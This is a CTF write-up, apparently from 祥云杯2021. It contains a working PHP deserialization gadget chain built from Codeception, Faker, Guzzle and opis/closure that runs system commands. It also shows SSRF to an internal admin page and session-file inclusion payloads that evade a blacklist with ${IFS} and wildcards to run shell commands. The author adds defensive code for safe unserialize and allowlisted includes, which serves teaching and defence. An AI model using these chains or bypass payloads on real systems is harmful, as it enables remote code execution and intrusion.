Some of the web challenges. I'm too weak to solve some of them.
ezyii
Reference: https://xz.aliyun.com/t/9948
The fourth chain was later deleted by the author of that article, though.
The code is as follows:
```php
<?php
namespace Codeception\Extension{
    use Faker\DefaultGenerator;
    use GuzzleHttp\Psr7\AppendStream;
    // Entry gadget: its properties are wired to the objects below.
    class RunProcess{
        protected $output;
        private $processes = [];
        public function __construct(){
            $this->processes[]=new DefaultGenerator(new AppendStream());
            $this->output=new DefaultGenerator('jiang');
        }
    }
    echo base64_encode(serialize(new RunProcess()));
}

namespace Faker{
    class DefaultGenerator
    {
        protected $default;

        public function __construct($default = null)
        {
            $this->default = $default;
        }
    }
}
namespace GuzzleHttp\Psr7{
    use Faker\DefaultGenerator;
    final class AppendStream{
        private $streams = [];
        private $seekable = true;
        public function __construct(){
            $this->streams[]=new CachingStream();
        }
    }
    final class CachingStream{
        private $remoteStream;
        public function __construct(){
            $this->remoteStream=new DefaultGenerator(false);
            // $stream is set as a dynamic property on purpose.
            $this->stream=new PumpStream();
        }
    }
    final class PumpStream{
        private $source;
        private $size=-10;
        private $buffer;
        public function __construct(){
            $this->buffer=new DefaultGenerator('j');
            // opis/closure turns the anonymous function into a serializable object.
            include("closure/autoload.php");
            $a = function(){system('cat /flag.txt');};
            $a = \Opis\Closure\serialize($a);
            $b = unserialize($a);
            $this->source=$b;
        }
    }
}
```
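Defender-side counterpart to the chain above. This is an added example, not code from the writeup or from Yii, Guzzle, Faker or opis/closure. It shows the `unserialize()` option that stops any such chain from instantiating its gadget classes, plus a walker that rejects object records outright. The function names `safeUnserialize` and `containsObject` and the two sample strings are my own.

```php
<?php
// Added example: how untrusted serialized input should be handled so that a
// gadget chain like the one above never gets its objects created.

// With allowed_classes => false every "O:" record becomes a
// __PHP_Incomplete_Class instance even when the real class is autoloadable,
// so no __wakeup()/__destruct()/__toString() of the target classes runs.
// The walker then refuses the payload if any object record is present at all.
function safeUnserialize(string $data)
{
    $value = @unserialize($data, ['allowed_classes' => false]);
    if ($value === false && $data !== 'b:0;') {
        throw new InvalidArgumentException('malformed serialized data');
    }
    if (containsObject($value)) {
        throw new InvalidArgumentException('serialized objects are not accepted');
    }
    return $value;
}

// Recursively look for objects; __PHP_Incomplete_Class still counts as one.
function containsObject($value): bool
{
    if (is_object($value)) {
        return true;
    }
    if (is_array($value)) {
        foreach ($value as $v) {
            if (containsObject($v)) {
                return true;
            }
        }
    }
    return false;
}

// Constructed sample inputs: a harmless array, and a minimal object record
// with the class name that starts the chain above (no properties needed).
$plain  = serialize(['page' => 'home', 'limit' => 10]);
$gadget = 'O:32:"Codeception\Extension\RunProcess":0:{}';

var_dump(safeUnserialize($plain));
try {
    safeUnserialize($gadget);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), PHP_EOL;
}
```

If the data format can be changed at all, JSON is the better fix: `json_decode()` has no object instantiation semantics, so there is nothing for a gadget chain to hook. Where PHP serialization must stay, `allowed_classes` with an explicit list of plain data classes (or `false`, as here) is the setting to audit for.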
安全检测 (Security Check)
A POST request produced an error message showing that the code uses file_get_contents,
so the first thought was to read files through a PHP stream wrapper (pseudo-protocol). I tried many of them; they were either disabled or simply did not work.
```http
POST /check2.php HTTP/1.1
Host: eci-2zefzyj8kapkgt0oad3m.cloudeci1.ichunqiu.com

url1=http://ss123.828.22.1/
```
Next I ran a directory scan and found an admin folder. Accessing it, payload: http://127.0.0.1/admin/
Then include123.php: http://127.0.0.1/admin/include123.php
```php
<?php
$u=$_GET['u'];

// Blacklist: every "|"-separated item is compiled as its own regex.
$pattern = "\/\*|\*|\.\.\/|\.\/|load_file|outfile|dumpfile|sub|hex|where";
$pattern .= "|file_put_content|file_get_content|fwrite|curl|system|eval|assert";
$pattern .="|passthru|exec|system|chroot|scandir|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restore";
$pattern .="|`|openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|assert|pcntl_exec|http|.php|.ph|.log|\@|:\/\/|flag|access|error|stdout|stderr";
$pattern .="|file|dict|gopher";
// Tired, tea break first

$vpattern = explode("|",$pattern);

foreach($vpattern as $value){
    if (preg_match( "/$value/i", $u )){
        echo "Malicious characters detected";
        exit(0);
    }
}

// The parameter is included directly once it passes the blacklist.
include($u);


show_source(__FILE__);
```
I tested many more inputs that did not work, then looked into the session file inclusion vulnerability; that must be it.
Common PHP session storage locations:
/var/lib/php/sess_PHPSESSID
/tmp/sess_PHPSESSID
/tmp/sessions/sess_PHPSESSID
Running phpinfo works.
payload: http://127.0.0.1/admin/include123.php?u=/tmp/sess_bedc37fbe5d2e7b064d01cce92e65182&test=<?=phpinfo();?>
<?="xx"?> is the PHP short echo tag, equivalent to <?php echo "xx" ?>.
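Why the session path slips through, and what closes it: an added example, not part of the challenge source or the writeup. It rebuilds the blacklist from include123.php as a function so it can be run against constructed inputs, and puts an allowlist-based include next to it. The function names, the page map and the sample inputs (including the made-up session id) are my own.

```php
<?php
// Added example: the challenge blacklist as a testable function, beside an
// allowlist include that does not let the client name a file at all.

// The challenge's pattern list, copied unchanged: each "|"-separated item is
// compiled as its own case-insensitive regex against the raw parameter.
function challengeBlacklist(): string
{
    $pattern = "\/\*|\*|\.\.\/|\.\/|load_file|outfile|dumpfile|sub|hex|where";
    $pattern .= "|file_put_content|file_get_content|fwrite|curl|system|eval|assert";
    $pattern .= "|passthru|exec|system|chroot|scandir|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restore";
    $pattern .= "|`|openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|assert|pcntl_exec|http|.php|.ph|.log|\@|:\/\/|flag|access|error|stdout|stderr";
    $pattern .= "|file|dict|gopher";
    return $pattern;
}

// true when the blacklist would let the value reach include().
function blacklistAllows(string $u): bool
{
    foreach (explode('|', challengeBlacklist()) as $value) {
        if (preg_match("/$value/i", $u)) {
            return false;
        }
    }
    return true;
}

// Allowlist: the request carries a page *name*; this map, not the client,
// decides which file is included. Anything not in the map is rejected.
function allowedPages(): array
{
    return [
        'home'  => __DIR__ . '/pages/home.php',
        'about' => __DIR__ . '/pages/about.php',
    ];
}

function resolveInclude(string $u): ?string
{
    return allowedPages()[$u] ?? null;
}

// Constructed inputs: one legitimate page name, two absolute paths (the
// session id is invented), a wrapper URL and a traversal attempt.
$samples = [
    'home',
    '/etc/passwd',
    '/tmp/sess_0123456789abcdef',
    'php://filter/resource=index.php',
    '../../../flag.txt',
];

foreach ($samples as $u) {
    printf("%-36s blacklist: %-8s allowlist: %s\n",
        $u,
        blacklistAllows($u) ? 'allowed' : 'blocked',
        resolveInclude($u) ?? '(rejected)');
}
```

Running this shows the gap the writeup exploits: `/etc/passwd` and `/tmp/sess_...` contain none of the blacklisted substrings, so the blacklist lets them straight into `include()`, while the wrapper URL and the traversal are caught. The session file is dangerous because whatever the application stores in `$_SESSION` (here the `test` parameter) is written to disk as text that `include()` will parse. The allowlist removes the whole class of problem: the parameter can no longer name a file, so the contents of the session file, `/tmp`, or any other path stop mattering for inclusion.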
Try running ls. Here ${IFS} is used in place of the space.
payload: http://127.0.0.1/admin/include123.php?u=/tmp/sess_bedc37fbe5d2e7b064d01cce92e65182&test=<?=system('ls${IFS}/');?>
bin boot dev etc getflag.sh home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var var
getflag.sh exists in the root directory, so try running it. Since flag is filtered, fl?g is used in place of flag.
payload: http://127.0.0.1/admin/include123.php?u=/tmp/sess_bedc37fbe5d2e7b064d01cce92e65182&test=<?=system('.${IFS}/getfl?g.sh');?>
References
An article to help you understand PHP file inclusion vulnerabilities (一篇文章带你理解漏洞之 PHP 文件包含漏洞)
File inclusion vulnerabilities (文件包含漏洞)
yii 2.0.42 latest deserialization exploit collection (yii 2.0.42 最新反序列化利用全集)
[祥云杯2021] writeup